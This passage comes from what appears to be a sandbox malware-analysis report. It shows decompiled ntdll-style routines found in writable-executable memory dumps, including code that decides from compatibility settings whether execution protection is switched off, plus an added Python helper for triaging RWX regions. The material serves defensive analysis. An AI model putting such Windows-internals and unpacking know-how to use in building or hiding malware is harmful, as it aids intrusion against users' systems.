                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%
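Every memory-dump block above names its source region with a file such as 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp and marks whether the region carried a PE image. The protection field 00000040 is the Win32 value PAGE_EXECUTE_READWRITE, and a writable-and-executable region that holds a PE image is where an unpacked or injected payload normally lives, so those are the dumps to pull first when triaging a report like this one. The script below is an added example, not part of the sandbox report or of the analysed sample: it parses the Source File / Associated lines, decodes the protection byte and lists the distinct RWX regions. The field order it assumes for the file name (process index, dump index, unique id, base address, protection, type) is an interpretation of the names on this page and is labelled as such in the code; the PAGE_* constants are the standard winnt.h values.

```python
"""Triage helper for the memory-dump descriptors listed in this report.

Added example; it is not part of the sandbox report or the analysed sample.
Assumed file-name layout (an interpretation of the names on the page, not
something the page documents):
    <process index>.<dump index>.<unique id>.<base address>.<protection>.<type>.sdmp
The PAGE_* values are the standard Win32 memory-protection constants.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# winnt.h memory protection constants (low byte of the protection field).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Assumed name layout; every component except the unique id is hexadecimal.
DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass(frozen=True)
class DumpRegion:
    process: int                 # sandbox process index (assumed meaning)
    dump_index: int              # dump round within that process (assumed meaning)
    base: int                    # start address of the dumped region
    protection: int              # raw protection field from the file name
    image_base: Optional[int]    # "Offset:" value on Source File lines, else None
    based_on_pe: Optional[bool]  # "based on PE:" flag on Source File lines, else None

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protection & 0xFF, f"0x{self.protection:X}")

    @property
    def is_rwx(self) -> bool:
        """True for PAGE_EXECUTE_READWRITE / PAGE_EXECUTE_WRITECOPY regions."""
        p = self.protection & 0xFF
        return p in EXECUTABLE and p in WRITABLE


def parse_dump_line(line: str) -> Optional[DumpRegion]:
    """Parse one 'Source File:' or 'Associated:' line; None if no dump name is present."""
    m = DUMP_RE.search(line)
    if m is None:
        return None
    offset = re.search(r"Offset:\s*([0-9A-Fa-f]+)", line)
    pe = re.search(r"based on PE:\s*(true|false)", line, re.IGNORECASE)
    return DumpRegion(
        process=int(m["proc"], 16),
        dump_index=int(m["dump"], 16),
        base=int(m["base"], 16),
        protection=int(m["prot"], 16),
        image_base=int(offset.group(1), 16) if offset else None,
        based_on_pe=(pe.group(1).lower() == "true") if pe else None,
    )


def find_rwx_regions(listing: str) -> List[DumpRegion]:
    """Distinct writable+executable regions in a listing, sorted by base address.

    The first line mentioning a base wins, so a Source File line (which carries
    the PE flag) takes precedence over a later Associated line for the same base.
    """
    seen = {}
    for line in listing.splitlines():
        region = parse_dump_line(line)
        if region is not None and region.base not in seen:
            seen[region.base] = region
    return sorted((r for r in seen.values() if r.is_rwx), key=lambda r: r.base)


def describe(region: DumpRegion) -> str:
    tag = "PE-backed" if region.based_on_pe else "no PE header recorded"
    return (f"process {region.process} dump {region.dump_index}: "
            f"0x{region.base:08X} {region.protection_name} ({tag})")


# Constructed sample: one Source File line and three Associated lines copied
# from the dump listing above.
SAMPLE_LISTING = """\
• Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
• Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
"""

if __name__ == "__main__":
    for r in find_rwx_regions(SAMPLE_LISTING):
        print(describe(r))
```

Run against the four lines embedded in the script, it reports all four regions as PAGE_EXECUTE_READWRITE, with the 0x00AA0000 dump flagged as PE-backed and the 0x00A90000 image base recovered from its Offset field; the Associated lines carry no PE flag, so they are reported without one rather than guessed. Feeding it the whole report page works the same way, since it ignores every line that does not contain a dump file name.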

                                                              C-Code - Quality: 94%
                                                              			E00AD8788(signed int __ecx, void* __edx, signed int _a4) {
                                                              				signed int _v8;
                                                              				short* _v12;
                                                              				void* _v16;
                                                              				signed int _v20;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				char _v44;
                                                              				signed int _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				char _v68;
                                                              				void* _t216;
                                                              				intOrPtr _t231;
                                                              				short* _t235;
                                                              				intOrPtr _t257;
                                                              				short* _t261;
                                                              				intOrPtr _t284;
                                                              				intOrPtr _t288;
                                                              				void* _t314;
                                                              				signed int _t318;
                                                              				short* _t319;
                                                              				intOrPtr _t321;
                                                              				void* _t328;
                                                              				void* _t329;
                                                              				char* _t332;
                                                              				signed int _t333;
                                                              				signed int* _t334;
                                                              				void* _t335;
                                                              				void* _t338;
                                                              				void* _t339;
                                                              
                                                              				_t328 = __edx;
                                                              				_t322 = __ecx;
                                                              				_t318 = 0;
                                                              				_t334 = _a4;
                                                              				_v8 = 0;
                                                              				_v28 = 0;
                                                              				_v48 = 0;
                                                              				_v20 = 0;
                                                              				_v40 = 0;
                                                              				_v32 = 0;
                                                              				_v52 = 0;
                                                              				if(_t334 == 0) {
                                                              					_t329 = 0xc000000d;
                                                              					L49:
                                                              					_t334[0x11] = _v56;
                                                              					 *_t334 =  *_t334 | 0x00000800;
                                                              					_t334[0x12] = _v60;
                                                              					_t334[0x13] = _v28;
                                                              					_t334[0x17] = _v20;
                                                              					_t334[0x16] = _v48;
                                                              					_t334[0x18] = _v40;
                                                              					_t334[0x14] = _v32;
                                                              					_t334[0x15] = _v52;
                                                              					return _t329;
                                                              				}
                                                              				_v56 = 0;
                                                              				if(E00AD8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                              					_v56 = 1;
                                                              					if(_v8 != 0) {
                                                              						_t207 = E00ABE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                              					}
                                                              					_push(1);
                                                              					_v8 = _t318;
                                                              					E00AD718A(_t207);
                                                              					_t335 = _t335 + 4;
                                                              				}
                                                              				_v60 = _v60 | 0xffffffff;
                                                              				if(E00AD8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                              					_t333 =  *_v8;
                                                              					_v60 = _t333;
                                                              					_t314 = E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              					_push(_t333);
                                                              					_v8 = _t318;
                                                              					E00AD718A(_t314);
                                                              					_t335 = _t335 + 4;
                                                              				}
                                                              				_t216 = E00AD8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                              				_t332 = ";";
                                                              				if(_t216 < 0) {
                                                              					L17:
                                                              					if(E00AD8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                              						L30:
                                                              						if(E00AD8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                              							L46:
                                                              							_t329 = 0;
                                                              							L47:
                                                              							if(_v8 != _t318) {
                                                              								E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              							}
                                                              							if(_v28 != _t318) {
                                                              								if(_v20 != _t318) {
                                                              									E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                              									_v20 = _t318;
                                                              									_v40 = _t318;
                                                              								}
                                                              							}
                                                              							goto L49;
                                                              						}
                                                              						_t231 = _v24;
                                                              						_t322 = _t231 + 4;
                                                              						_push(_t231);
                                                              						_v52 = _t322;
                                                              						E00AD718A(_t231);
                                                              						if(_t322 == _t318) {
                                                              							_v32 = _t318;
                                                              						} else {
                                                              							_v32 = E00ABE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              						}
                                                              						if(_v32 == _t318) {
                                                              							_v52 = _t318;
                                                              							L58:
                                                              							_t329 = 0xc0000017;
                                                              							goto L47;
                                                              						} else {
                                                              							E00AB2340(_v32, _v8, _v24);
                                                              							_v16 = _v32;
                                                              							_a4 = _t318;
                                                              							_t235 = E00ACE679(_v32, _t332);
                                                              							while(1) {
                                                              								_t319 = _t235;
                                                              								if(_t319 == 0) {
                                                              									break;
                                                              								}
                                                              								 *_t319 = 0;
                                                              								_t321 = _t319 + 2;
                                                              								E00ABE2A8(_t322,  &_v68, _v16);
                                                              								if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
                                                              									_a4 = _a4 + 1;
                                                              								}
                                                              								_v16 = _t321;
                                                              								_t235 = E00ACE679(_t321, _t332);
                                                              								_pop(_t322);
                                                              							}
                                                              							_t236 = _v16;
                                                              							if( *_v16 != _t319) {
                                                              								E00ABE2A8(_t322,  &_v68, _t236);
                                                              								if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
                                                              									_a4 = _a4 + 1;
                                                              								}
                                                              							}
                                                              							if(_a4 == 0) {
                                                              								E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                              								_v52 = _v52 & 0x00000000;
                                                              								_v32 = _v32 & 0x00000000;
                                                              							}
                                                              							if(_v8 != 0) {
                                                              								E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                              							}
                                                              							_v8 = _v8 & 0x00000000;
                                                              							_t318 = 0;
                                                              							goto L46;
                                                              						}
                                                              					}
                                                              					_t257 = _v24;
                                                              					_t322 = _t257 + 4;
                                                              					_push(_t257);
                                                              					_v40 = _t322;
                                                              					E00AD718A(_t257);
                                                              					_t338 = _t335 + 4;
                                                              					if(_t322 == _t318) {
                                                              						_v20 = _t318;
                                                              					} else {
                                                              						_v20 = E00ABE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              					}
                                                              					if(_v20 == _t318) {
                                                              						_v40 = _t318;
                                                              						goto L58;
                                                              					} else {
                                                              						E00AB2340(_v20, _v8, _v24);
                                                              						_v16 = _v20;
                                                              						_a4 = _t318;
                                                              						_t261 = E00ACE679(_v20, _t332);
                                                              						_t335 = _t338 + 0x14;
                                                              						while(1) {
                                                              							_v12 = _t261;
                                                              							if(_t261 == _t318) {
                                                              								break;
                                                              							}
                                                              							_v12 = _v12 + 2;
                                                              							 *_v12 = 0;
                                                              							E00ABE2A8(_v12,  &_v68, _v16);
                                                              							if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
                                                              								_a4 = _a4 + 1;
                                                              							}
                                                              							_v16 = _v12;
                                                              							_t261 = E00ACE679(_v12, _t332);
                                                              							_pop(_t322);
                                                              						}
                                                              						_t269 = _v16;
                                                              						if( *_v16 != _t318) {
                                                              							E00ABE2A8(_t322,  &_v68, _t269);
                                                              							if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
                                                              								_a4 = _a4 + 1;
                                                              							}
                                                              						}
                                                              						if(_a4 == _t318) {
                                                              							E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                              							_v40 = _t318;
                                                              							_v20 = _t318;
                                                              						}
                                                              						if(_v8 != _t318) {
                                                              							E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              						}
                                                              						_v8 = _t318;
                                                              						goto L30;
                                                              					}
                                                              				}
                                                              				_t284 = _v24;
                                                              				_t322 = _t284 + 4;
                                                              				_push(_t284);
                                                              				_v48 = _t322;
                                                              				E00AD718A(_t284);
                                                              				_t339 = _t335 + 4;
                                                              				if(_t322 == _t318) {
                                                              					_v28 = _t318;
                                                              				} else {
                                                              					_v28 = E00ABE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              				}
                                                              				if(_v28 == _t318) {
                                                              					_v48 = _t318;
                                                              					goto L58;
                                                              				} else {
                                                              					E00AB2340(_v28, _v8, _v24);
                                                              					_v16 = _v28;
                                                              					_a4 = _t318;
                                                              					_t288 = E00ACE679(_v28, _t332);
                                                              					_t335 = _t339 + 0x14;
                                                              					while(1) {
                                                              						_v12 = _t288;
                                                              						if(_t288 == _t318) {
                                                              							break;
                                                              						}
                                                              						_v12 = _v12 + 2;
                                                              						 *_v12 = 0;
                                                              						E00ABE2A8(_v12,  &_v68, _v16);
                                                              						if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
                                                              							_a4 = _a4 + 1;
                                                              						}
                                                              						_v16 = _v12;
                                                              						_t288 = E00ACE679(_v12, _t332);
                                                              						_pop(_t322);
                                                              					}
                                                              					_t296 = _v16;
                                                              					if( *_v16 != _t318) {
                                                              						E00ABE2A8(_t322,  &_v68, _t296);
                                                              						if(E00AD5553(_t328,  &_v68,  &_v36) != 0) {
                                                              							_a4 = _a4 + 1;
                                                              						}
                                                              					}
                                                              					if(_a4 == _t318) {
                                                              						E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                              						_v48 = _t318;
                                                              						_v28 = _t318;
                                                              					}
                                                              					if(_v8 != _t318) {
                                                              						E00ABE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              					}
                                                              					_v8 = _t318;
                                                              					goto L17;
                                                              				}
                                                              			}

                                                              APIs
                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 00AD87C1
                                                              • Kernel-MUI-Number-Allowed, xrefs: 00AD87E6
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00AD8827
                                                              • Kernel-MUI-Language-SKU, xrefs: 00AD89FC
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00AD8914
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: 5c4f9baee81f8e8dbbb59ef3cfcf2fa5b1ecfe2e643557cd26513729e1303a6e
                                                              • Instruction ID: ad7cedae243c74b654d86ac8fa405d2df327f4b9eead565faffdb1c7ff2da568
                                                              • Opcode Fuzzy Hash: 5c4f9baee81f8e8dbbb59ef3cfcf2fa5b1ecfe2e643557cd26513729e1303a6e
                                                              • Instruction Fuzzy Hash: E1F1E8B2D00249EFCF11EF99CA85DEEB7B8FF18300F15446AE506A7211EB359A45DB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 38%
                                                              			E00AF13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr* _v16;
                                                              				intOrPtr _v20;
                                                              				char _v24;
                                                              				intOrPtr _t71;
                                                              				signed int _t78;
                                                              				signed int _t86;
                                                              				char _t90;
                                                              				signed int _t91;
                                                              				signed int _t96;
                                                              				intOrPtr _t108;
                                                              				signed int _t114;
                                                              				void* _t115;
                                                              				intOrPtr _t128;
                                                              				intOrPtr* _t129;
                                                              				void* _t130;
                                                              
                                                              				_t129 = _a4;
                                                              				_t128 = _a8;
                                                              				_t116 = 0;
                                                              				_t71 = _t128 + 0x5c;
                                                              				_v8 = 8;
                                                              				_v20 = _t71;
                                                              				if( *_t129 == 0) {
                                                              					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                              						goto L5;
                                                              					} else {
                                                              						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                              						if(_t96 != 0) {
                                                              							L38:
                                                              							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                              								goto L5;
                                                              							} else {
                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                              								_t86 = E00AE7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                              								L36:
                                                              								return _t128 + _t86 * 2;
                                                              							}
                                                              						}
                                                              						_t114 =  *(_t129 + 0xa) & 0x0000ffff; /* group 5 */
                                                              						if(_t114 == 0) {
                                                              							L33:
                                                              							_t115 = 0xab2926; /* empty prefix: IPv4-compatible "::a.b.c.d" */
                                                              							L35:
                                                              							_push( *(_t129 + 0xf) & 0x000000ff);
                                                              							_push( *(_t129 + 0xe) & 0x000000ff);
                                                              							_push( *(_t129 + 0xd) & 0x000000ff);
                                                              							_push( *(_t129 + 0xc) & 0x000000ff);
                                                              							/* %hs takes _t115, either "" or the "ffff:" literal listed under String ID below */
                                                              							_t86 = E00AE7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                              							goto L36;
                                                              						}
                                                              						if(_t114 != 0xffff) {
                                                              							_t116 = 0;
                                                              							goto L38; /* neither form: the general hex printer (L38 lies outside this excerpt) */
                                                              						}
                                                              						if(_t114 != 0) { /* always true here (_t114 == 0xffff): IPv4-mapped "::ffff:a.b.c.d" */
                                                              							_t115 = 0xab9cac;
                                                              							goto L35;
                                                              						}
                                                              						goto L33;
                                                              					}
                                                              				} else {
                                                              					L5:
                                                              					/* General form: up to _v8 hex groups with the longest run of zero groups
                                                              					   compressed to "::". _a4/_a8 record that run as [start, end) and _v12 the
                                                              					   start of the run being scanned; _t116 is 0 here. */
                                                              					_a8 = _t116;
                                                              					_a4 = _t116;
                                                              					_v12 = _t116;
                                                              					/* ISATAP interface id (group 4 is 0 or 0x200, group 5 is 0x5efe; 0xfe5e is the
                                                              					   little-endian read of the big-endian group): six hex groups, then the dotted quad */
                                                              					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                              						if( *(_t129 + 0xa) == 0xfe5e) {
                                                              							_v8 = 6;
                                                              						}
                                                              					}
                                                              					_t90 = _v8;
                                                              					if(_t90 <= _t116) {
                                                              						L11:
                                                              						if(_a8 - _a4 <= 1) { /* a single zero group is not compressed */
                                                              							_a8 = _t116;
                                                              							_a4 = _t116;
                                                              						}
                                                              						_t91 = 0;
                                                              						if(_v8 <= _t116) {
                                                              							L22:
                                                              							/* fewer than eight hex groups (ISATAP): append the last four bytes as ":a.b.c.d" */
                                                              							if(_v8 < 8) {
                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                              								_t128 = _t128 + E00AE7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                              							}
                                                              							return _t128;
                                                              						} else {
                                                              							L14:
                                                              							/* _t91 indexes the groups: outside the zero run print ":" (not before the
                                                              							   first group nor right after "::") and then the 16-bit group as %x */
                                                              							if(_a4 > _t91 || _t91 >= _a8) {
                                                              								if(_t91 != _t116 && _t91 != _a8) {
                                                              									_push(":");
                                                              									_push(_t71 - _t128 >> 1);
                                                              									_push(_t128);
                                                              									_t128 = _t128 + E00AE7707() * 2;
                                                              									_t71 = _v20;
                                                              									_t130 = _t130 + 0xc;
                                                              								}
                                                              								_t78 = E00AE7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                              								_t130 = _t130 + 0x10;
                                                              							} else {
                                                              								/* first group of the zero run: emit "::" and skip to the run's last group */
                                                              								_push(L"::");
                                                              								_push(_t71 - _t128 >> 1);
                                                              								_push(_t128);
                                                              								_t78 = E00AE7707();
                                                              								_t130 = _t130 + 0xc;
                                                              								_t91 = _a8 - 1;
                                                              							}
                                                              							_t91 = _t91 + 1;
                                                              							_t128 = _t128 + _t78 * 2;
                                                              							_t71 = _v20;
                                                              							if(_t91 >= _v8) {
                                                              								goto L22;
                                                              							}
                                                              							_t116 = 0;
                                                              							goto L14;
                                                              						}
                                                              					} else {
                                                              						/* Scan the _v8 groups for the longest run of zeros. _t108 is the 1-based
                                                              						   position, _v12 the start of the current run; a run is recorded only when
                                                              						   strictly longer than the one held in _a4/_a8, so the first longest wins. */
                                                              						_t108 = 1;
                                                              						_v16 = _t129;
                                                              						_v24 = _t90;
                                                              						do {
                                                              							if( *_v16 == _t116) { /* zero group: extend the current run */
                                                              								if(_t108 - _v12 > _a8 - _a4) {
                                                              									_a4 = _v12;
                                                              									_a8 = _t108;
                                                              								}
                                                              								_t116 = 0;
                                                              							} else {
                                                              								_v12 = _t108; /* non-zero group: the next run can start after it */
                                                              							}
                                                              							_v16 = _v16 + 2;
                                                              							_t108 = _t108 + 1;
                                                              							_t26 =  &_v24;
                                                              							 *_t26 = _v24 - 1;
                                                              						} while ( *_t26 != 0);
                                                              						goto L11;
                                                              					}
                                                              				}
                                                              			}

                                                              Instruction address column for the listing above (one entry per statement; 0x00000000 marks a statement without one): 0x00af138e to 0x00af14ac, with out-of-line blocks at 0x00b1e8fd to 0x00b1ea05.

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 2aadc43fc5ea54159f471746939b5d0eaf6e7eb2fb12e9104d12ae68941dd8ad
                                                              • Instruction ID: 72463a78efba54cfdf669d9a47393c446a86607346688694d2b7ff926d498d41
                                                              • Opcode Fuzzy Hash: 2aadc43fc5ea54159f471746939b5d0eaf6e7eb2fb12e9104d12ae68941dd8ad
                                                              • Instruction Fuzzy Hash: FB6116B1900659EACB24CF9AC8908BFBBF5EFD4301B54C56DFAA647541D334AA40DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			/* Loader routine from ntdll (its own debug strings say "CLIENT(ntdll)") found in
                                                              			   the dumped region. _a4 points at a per-image record: +0x2c is handed to
                                                              			   E00AE7F4F, which reads CheckAppHelp from ImageFileExecutionOptions; +0x24 is
                                                              			   the UNICODE_STRING logged as %wZ; +0x18, +0x20 and +0x28 go to the application
                                                              			   compatibility database query. Returns 1 when the ExecuteOptions value contains
                                                              			   "Execute=1", i.e. when execution protection is to be turned off for the
                                                              			   process, otherwise 0. */
                                                              			E00AE7EFD(void* __ecx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				char _v540;
                                                              				unsigned int _v544;
                                                              				signed int _v548;
                                                              				intOrPtr _v552;
                                                              				char _v556;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t33;
                                                              				void* _t38;
                                                              				unsigned int _t46;
                                                              				unsigned int _t47;
                                                              				unsigned int _t52;
                                                              				intOrPtr _t56;
                                                              				unsigned int _t62;
                                                              				void* _t69;
                                                              				void* _t70;
                                                              				intOrPtr _t72;
                                                              				signed int _t73;
                                                              				void* _t74;
                                                              				void* _t75;
                                                              				void* _t76;
                                                              				void* _t77;
                                                              
                                                              				_t33 =  *0xb92088; // 0x757c166b
                                                              				_v8 = _t33 ^ _t73; /* stack-protector cookie, checked again on return */
                                                              				_v548 = _v548 & 0x00000000;
                                                              				_t72 = _a4;
                                                              				/* CheckAppHelp from ImageFileExecutionOptions; give up when the lookup fails or the value is 0 */
                                                              				if(E00AE7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                              					__eflags = _v548;
                                                              					if(_v548 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t62 = _t72 + 0x24;
                                                              					E00B03F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                              					/* zero a 0x214-byte buffer (E00ABDFC0 behaves like memset) and ask the
                                                              					   compatibility database for the "ExecuteOptions" string through the
                                                              					   indirect call at 0xb94218; _v544 carries the buffer size in and the
                                                              					   returned size out */
                                                              					_t71 = 0x214;
                                                              					_v544 = 0x214;
                                                              					E00ABDFC0( &_v540, 0, 0x214);
                                                              					_t75 = _t74 + 0x20;
                                                              					_t46 =  *0xb94218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                              					__eflags = _t46;
                                                              					if(_t46 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t47 = _v544; /* bytes returned */
                                                              					__eflags = _t47;
                                                              					if(_t47 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					__eflags = _t47 - 0x214;
                                                              					if(_t47 >= 0x214) { /* a full buffer leaves no room for the terminator: reject */
                                                              						goto L1;
                                                              					}
                                                              					_push(_t62);
                                                              					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0; /* NUL-terminate the returned wide string */
                                                              					E00B03F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                              					_t52 = E00AC0D27( &_v540, L"Execute=1"); /* wcsstr-like search; non-zero when found */
                                                              					_t76 = _t75 + 0x1c;
                                                              					_push(_t62);
                                                              					__eflags = _t52;
                                                              					if(_t52 == 0) {
                                                              						/* No "Execute=1": the value is a space-separated list of section names,
                                                              						   each handed to E00B2E8DB for "patching section protection" */
                                                              						E00B03F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                              						_t71 =  &_v540;
                                                              						_t56 = _t73 + _v544 - 0x218; /* end of the returned data */
                                                              						_t77 = _t76 + 0x14;
                                                              						_v552 = _t56;
                                                              						__eflags = _t71 - _t56;
                                                              						if(_t71 >= _t56) {
                                                              							goto L1;
                                                              						} else {
                                                              							goto L10;
                                                              						}
                                                              						while(1) {
                                                              							L10:
                                                              							_t62 = E00AC8375(_t71, 0x20); /* wcschr-like: position of the next ' ' */
                                                              							_pop(_t69);
                                                              							__eflags = _t62;
                                                              							if(__eflags != 0) {
                                                              								__eflags = 0;
                                                              								 *_t62 = 0; /* cut the token at the space */
                                                              							}
                                                              							E00B03F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                              							_t77 = _t77 + 0x10;
                                                              							E00B2E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                              							__eflags = _t62;
                                                              							if(_t62 == 0) { /* last token: return 0, execution protection stays on */
                                                              								goto L1;
                                                              							}
                                                              							_t31 = _t62 + 2; // 0x2
                                                              							_t71 = _t31; /* next token starts after the space */
